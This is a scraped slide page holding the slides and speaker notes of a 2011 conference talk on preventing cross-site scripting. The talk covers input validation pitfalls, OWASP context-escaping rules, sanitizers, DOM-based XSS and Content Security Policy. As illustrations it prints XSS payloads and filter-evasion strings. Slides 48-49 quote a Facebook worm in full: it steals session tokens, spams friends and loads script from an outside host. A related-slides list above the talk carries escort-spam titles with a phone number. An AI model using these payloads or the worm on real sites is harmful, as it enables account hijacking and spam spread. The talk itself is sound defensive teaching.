Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 

Avoiding Cross Site Scripting - Not as easy as you might think

  • 1. Avoiding Cross Site Scripting Not as easy as you might think NDC2011 – Erlend Oftedal
  • 2. Y
  • 3.
  • 4. Some security experts say it's easy to protect against... but that may not always be the case
  • 5. Statistics Common error OWASP Top 10 Sans Top 25 Most Dangerous software errors http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 6. XSS - statistics http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 8. Risk Stealing data from client Stealing data from server Exploiting the browser Session hijacking Form manipulation - keylogging
  • 11. Why the name Cross Site Scripting? <iframe src="http://mail.google.com"> <script> </iframe>
  • 12.
  • 14.
  • 15. Demo
  • 16. What’s going on? <input type="text" name="search" value=""> An input of 123 yields:     <input type="text" name="search" value="123"> An input of hello"world yields:     <input type="text" name="search“ value="hello"world"> An input of hello"><script>alert(1)</script> yields:     <input type="text" name="search"     value="hello"><script>alert(1)</script>">
  • 17. Types of Cross Site Scripting Reflected Persistent Second order / indirect / side channel
  • 18.  
  • 19.  
  • 20.  
  • 21.  
  • 23. What data can you actually trust? Scripts? Web services? Databases?
  • 24. Input validation Blacklisting keywords Blacklisting/whitelisting characters
  • 25. How do you validate input? Input: test Validation: [a-z]+
  • 26. How do you validate input? Input: "this is a test" Validation: [a-z"]+
  • 27. How do you validate input? Input: Conan O’Brian Validation: [a-zA-Z"']+
  • 28. How do you validate input? Input: No, your calculation is wrong, because x > 5 Validation: [a-zA-Z"'>.,]+
  • 29. How do you validate input? Input: Try moving the <script> tag to the bottom of the page. Validation: [a-zA-Z"‘<>.,]+
  • 30. ASP.NET Request Validation Throws exception on: &# < followed by a-z, !, ? Or / Can be disabled per page / model field Sometimes good reason to disable Only stops the simpler attacks
  • 31. Demo
  • 32. A couple of tricks Build a javascript string without quotes: String.fromCharCode(88, 83, 83) /XSS/.source Running script without user invocation: <img src="x" onerror="alert(1)" /> <input ... Value="" autofocus onfocus="alert(1)" />
  • 33.
  • 38.
  • 39. It's all a matter of context
  • 40. Per context escaping We need to escape depending on context(s) OWASP XSS Prevention Cheat Sheet Rules for context and escaping
  • 41. Rule #0 - Forbidden  <script>...NEVER PUT UNTRUSTED DATA HERE...</script>   directly in a script    <!--...NEVER PUT UNTRUSTED DATA HERE...-->           inside an HTML comment    <div...NEVER PUT UNTRUSTED DATA HERE...=test/>      in an attribute name    <NEVER PUT UNTRUSTED DATA HERE... href="/test"/>     in a tag name
  • 42. Rule#1 – Between tags <div> ...HTML ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE... </div> => HTML escaping
  • 43. Rule#2 - Attributes Inside unquoted attribute: <divattr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...> content </div>       Inside single quoted attribute <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'> content </div>     Inside double quoted attribute <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."> content </div>      HTML attribute escaping
  • 44. Rule #3 – in javascript strings Inside a quoted string <script> alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...') </script>     One side of a quoted expression <script> x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' </script>            Inside quoted event handler: <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"></div>   Javascriptescaping NEVER put untrusted data inside strings passed to eval(), setInterval() and similar
  • 45. Rule #4 – In CSS <style>     selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>      <style>     selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; }  </style>   <spanstyle="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">     text </span> CSS escaping
  • 46. Rule#5 - URLs <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a> URL escaping
  • 48. var message = "Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process..."; varjsText= "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; varmyText= "==>[VERIFY MY ACCOUNT]<=="; varpost_form_id= .getElementsByName('post_form_id')[0].value; varfb_dtsg= .getElementsByName('fb_dtsg')[0].value; varuid= .cookie.match( .cookie.match(/c_user=(+)/)[1]); var friends = new (); gf= new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" +uid+ "&"+ .random(),false); gf.send(); if(gf.readyState!=4){ }else{ data = ('(' +gf.responseText.substr(9) + ')'); if(data.error){ }else{ friends =data.payload.entries.sort(function(a,b){return a.index-b.index;}); } } for(var i=0; i<friends.length; i++){ varhttpwp= new XMLHttpRequest(); varurlwp= "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp= "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" +post_form_id+ "&fb_dtsg=" +fb_dtsg+ "&feed_info[action_links][0][href]=" + (jsText) + "&feed_info[action_links][0][text]=" + (myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid+ "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange= function(){ if (httpwp.readyState== 4 &&httpwp.status== 200){ } } httpwp.send(paramswp); } alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted."); .location = "http://pelorak.info/verify.php?js";
  • 49. varmyText = "==>[VERIFY MY ACCOUNT]<=="; varjsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; ... For each friend post a message { varurlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + (jsText) + "&feed_info[action_links][0][text]=" + (myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message; ... }
  • 50. Rule#6 – Use a policy driven engine Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way. Must be a whitelist based engine. OWASP AntiSamy HtmlPurifier
  • 51. Why you do NOT write your own HTML-cleaner/sanitizer <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|^`=alert("XSS")> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾ http://ha.ckers.org/xss.html
  • 52. Rule#7 – Avoid DOM based XSS
  • 53.
  • 56. window.location.hashAllows attacks present in URLs that are never seen by the server http://www.somesite.com/#banner=may2011 http://www.somesite.com/#banner=may2011"><script>...
  • 57. Demo
  • 58. Demo $(location.hash) $("#<script>alert(1)</script>") http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
  • 59.
  • 60. Beware of the complex contexts
  • 61. See the OWASP DOM based XSS prevention Cheat Sheethttps://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
  • 63. AntiXss as the default encoder Web.config <system.web>   <httpRuntime      encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary" /> New in 4.1 beta
  • 64. MVC3 - Razor @SomeValue- HTML escaped @Html.Raw(SomeValue) - No escaping @{ varvalue = newHtmlString("<p>hello</p>"); } @value - No escaping @Html.TextBox(...)    - Escapes attributes Will not protect against javascript inside HTML, or javascript inside HTML-attributes.
  • 65.
  • 66. header based - server instructs browser
  • 67. policies for javascript, frames, images, style etc.X-Content-Security-Policy: allow *; script-src'self‘ X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.ndc2010.no:443 X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script https://wiki.mozilla.org/Security/CSP/Spec http://nuget.org/List/Packages/ContentSecurityPolicy.Net
  • 68. Other approaches – Taint Tracking A variable is marked as tainted if in contains user input tainted + tainted = tainted untainted + tainted = tainted untainted + untainted = untainted Partial taint – allows for partial escaping var html = "<h1>" + user_value + "</h1>"; [bitmask =  0000    1111111...   00000 ]
  • 69.
  • 70.
  • 71.
  • 75. Can be declared inline<html>...<div>...<svg>... http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf
  • 76.
  • 77.
  • 78. Other types of XSS - Plugins XSS in flash XSS in Adobe Reader
  • 79. Questions Join your local OWASP chapter (NNUG for web security)! Oslo chapter is at https://www.owasp.org/index.php/Norway Erlend Oftedal erlend.oftedal@bekk.no @webtonull
  • 80.
  • 81. OWASP XSS Prevention Cheat Sheet:https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • 82. OWASP DOM based XSS Prevention Cheat Sheet:https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
  • 84. HTML5 security cheat sheet:http://html5sec.org/
  • 85. Locking the throne room - Mario Heiderichhttps://www.owasp.org/images/a/a3/Mario_Heiderich_OWASP_Sweden_Locking_the_throneroom.pdf
  • 86. The image that called me - Mario Heiderichhttp://www.owasp.org/images/a/aa/The_image_that_called_me.pdf

Hinweis der Redaktion

  1. Why on earth are we talking about cross site scripting? Isn’t that really old?
  2. Back in the 90’s, any proper website would have a guestbookPeople would post all sorts of shady imagesInject H1Or &lt;bgcolor&gt; or &lt;blink&gt;Spammers took over – immediate redirect to their glorious viagra store
  3. Already security conscious
  4. If we were not protected against cross site scripting....Same Origin Policy - Same domain, port and protocolThis is chaning with cross domain requests, but this is bascially what the SOP says
  5. Søkefelt xss – escape til script tag
  6. What can you actually trust?
  7. Do you really know all the events in HTML5?Do you really know all the reserved words in javascript?Could any of those be valid inputs?
  8. DEMO: slå på og vis allikevel&quot; onfocus=&quot;alert(1)&quot; autofocus x=&quot;
  9. Turn on request validaionUse onfocus + autofocus
  10. This will stop a lot of the attacks, but unfortunately not all of them.
  11. http://localhost:62795/OwaspXss/Rule3
  12. Firebug + javascript
  13. ExpressionOpera modifies link
  14. Notice the mobile icon
  15. Html5sec.org/innerhtml
  16. Demo hvis tid
  17. Allows the system to track taint from source to sink, even through transformationsAllows the framework to know which strings need to be escapedDominatorRuby on Rails + Python
  18. Demo hvis tid
  19. NDC video!